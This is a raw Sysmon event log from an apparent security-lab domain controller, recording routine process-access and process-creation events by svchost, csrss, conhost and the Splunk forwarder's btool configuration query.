13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.374{59A5CD1D-8EE6-6005-CD00-00000000A301}48324848C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.375{59A5CD1D-8EE6-6005-CE00-00000000A301}4868C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE6-6005-CC00-00000000A301}47924836C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.369{59A5CD1D-8EE6-6005-CD00-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CC00-00000000A301}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.359{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 